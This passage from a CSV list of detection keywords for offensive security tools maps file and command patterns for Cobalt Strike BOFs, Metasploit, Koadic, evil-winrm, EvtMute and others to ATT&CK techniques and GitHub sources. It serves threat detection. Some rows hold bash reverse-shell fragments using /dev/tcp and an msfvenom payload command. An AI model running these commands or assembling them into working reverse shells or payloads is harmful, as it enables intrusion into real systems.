TA0005,N/A,N/A,Phishing,https://github.com/kgretzky/evilqr,1,1,N/A,N/A,2,152,21,2023-07-05T13:24:44Z,2023-06-20T12:58:09Z -*evilqr-phishing*,offensive_tool_keyword,evilqr,Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice,T1566.002 - T1204.001 - T1192,TA0001 - TA0005,N/A,N/A,Phishing,https://github.com/kgretzky/evilqr,1,1,N/A,N/A,2,152,21,2023-07-05T13:24:44Z,2023-06-20T12:58:09Z -*evilqr-server*,offensive_tool_keyword,evilqr,Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice,T1566.002 - T1204.001 - T1192,TA0001 - TA0005,N/A,N/A,Phishing,https://github.com/kgretzky/evilqr,1,1,N/A,N/A,2,152,21,2023-07-05T13:24:44Z,2023-06-20T12:58:09Z -*evilsocket*,offensive_tool_keyword,Github Username,github username of hacker known for sniffing and spoofing exploitation tools,N/A,N/A,N/A,N/A,Sniffing & Spoofing,https://github.com/evilsocket,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*EvilTwin.dmp*,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,1,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -*EvilTwinServer.nim*,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,1,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -*evil-winrm -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*evil-winrm*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021 - T1028 - T1046 - T1078 - T1091 - T1219,TA0003 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,1,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*EvtMuteHook.dll*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*EvtMuteHook.dll*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*EvtMuteHook.iobj*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*EvtMuteHook.ipdb*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*EvtMuteHook.pdb*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*EvtMuteHook.sln*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*EvtMute-master*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*EVUAC *.exe*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/EventViewerUAC_BOF,1,0,N/A,10,10,130,29,2022-05-06T17:43:05Z,2022-05-02T02:08:52Z -*ewby/Mockingjay_BOF*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique,T1055.012 - T1059.001 - T1027.002,TA0002 - TA0005,N/A,N/A,C2,https://github.com/ewby/Mockingjay_BOF,1,1,N/A,9,10,32,7,2023-08-27T14:09:39Z,2023-08-27T06:01:28Z -*ewok -t *,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file ewok (snmpwalk like),T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Information Gathering,https://github.com/wolf-project/NSA-TOOLS-SHADOW-BROKERS,1,0,N/A,N/A,1,32,17,2017-04-20T16:24:49Z,2017-05-13T19:51:23Z -*example-bof.sln*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*examples/netview.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*Excel-Exploit.git*,offensive_tool_keyword,Excel-Exploit,MacroExploit use in excel sheet,T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main,1,1,N/A,N/A,1,21,4,2023-06-12T11:47:52Z,2023-06-12T11:46:53Z -*Excel-Exploit-main*,offensive_tool_keyword,Excel-Exploit,MacroExploit use in excel sheet,T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main,1,1,N/A,N/A,1,21,4,2023-06-12T11:47:52Z,2023-06-12T11:46:53Z -*ExcelReflectImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*excelshellinject.*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*exchange_proxylogon_rce.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exchange_proxynotshell_rce.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exe_dll_shellcode genetic.config*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,0,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -*exe_stager.exe*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*exe_to_dll.exe*,offensive_tool_keyword,exe_to_dll,Converts a EXE into DLL,T1027.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hasherezade/exe_to_dll,1,1,N/A,5,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*exe_to_dll.exe*,offensive_tool_keyword,exe_to_dll,Converts an EXE so that it can be loaded like a DLL.,T1055.002 - T1073.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/hasherezade/exe_to_dll,1,1,N/A,8,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*exe_to_dll_*.zip*,offensive_tool_keyword,exe_to_dll,Converts a EXE into DLL,T1027.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hasherezade/exe_to_dll,1,1,N/A,5,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*exe_to_dll_*_32bit.zip*,offensive_tool_keyword,exe_to_dll,Converts an EXE so that it can be loaded like a DLL.,T1055.002 - T1073.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/hasherezade/exe_to_dll,1,1,N/A,8,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*exe_to_dll_*_64bit.zip*,offensive_tool_keyword,exe_to_dll,Converts an EXE so that it can be loaded like a DLL.,T1055.002 - T1073.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/hasherezade/exe_to_dll,1,1,N/A,8,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*exe_to_dll-master*,offensive_tool_keyword,exe_to_dll,Converts a EXE into DLL,T1027.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hasherezade/exe_to_dll,1,1,N/A,5,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*exe_to_dll-master*,offensive_tool_keyword,exe_to_dll,Converts an EXE so that it can be loaded like a DLL.,T1055.002 - T1073.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/hasherezade/exe_to_dll,1,1,N/A,8,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*exe2bat.cpp*,offensive_tool_keyword,exe2powershell,exe2powershell is used to convert any binary file to a bat/powershell file,T1059.001 - T1027.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/yanncam/exe2powershell,1,1,N/A,6,2,153,44,2020-10-15T08:22:30Z,2016-03-02T11:23:32Z -*exe2bat.exe*,offensive_tool_keyword,exe2powershell,exe2powershell is used to convert any binary file to a bat/powershell file,T1059.001 - T1027.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/yanncam/exe2powershell,1,1,N/A,6,2,153,44,2020-10-15T08:22:30Z,2016-03-02T11:23:32Z -*exe2powershell.cpp*,offensive_tool_keyword,exe2powershell,exe2powershell is used to convert any binary file to a bat/powershell file,T1059.001 - T1027.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/yanncam/exe2powershell,1,1,N/A,6,2,153,44,2020-10-15T08:22:30Z,2016-03-02T11:23:32Z -*exe2powershell.exe*,offensive_tool_keyword,exe2powershell,exe2powershell is used to convert any binary file to a bat/powershell file,T1059.001 - T1027.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/yanncam/exe2powershell,1,1,N/A,6,2,153,44,2020-10-15T08:22:30Z,2016-03-02T11:23:32Z -*exe2powershell-master*,offensive_tool_keyword,exe2powershell,exe2powershell is used to convert any binary file to a bat/powershell file,T1059.001 - T1027.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/yanncam/exe2powershell,1,1,N/A,6,2,153,44,2020-10-15T08:22:30Z,2016-03-02T11:23:32Z -*exec /bin/sh 0&0 2>&0*,greyware_tool_keyword,bash,bash reverse shell ,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*exec 5<>/dev/tcp/*/**cat <&5 | while read line* do $line 2>&5 >&5* done*,greyware_tool_keyword,bash,bash reverse shell ,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*exec CMD=/bin/sh -f elf -o *.elf*,offensive_tool_keyword,msfvenom,Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.,T1059.001 - T1027 - T1210.001 - T1204.002,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exec_payload_msi*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exec_shellcode.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ExecCmdImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Exec-Command-Silent.vbs*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*--exec-method smbexec*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*execmethod*PowerPick*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*execmethod*PowerShell*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*execPayloads.txt*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*Executable_Files-main.zip*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*execute_assembly -Assembly *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*execute_assembly SharpCloud*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*execute_bof *,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -*execute_dotnet_assembly.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - 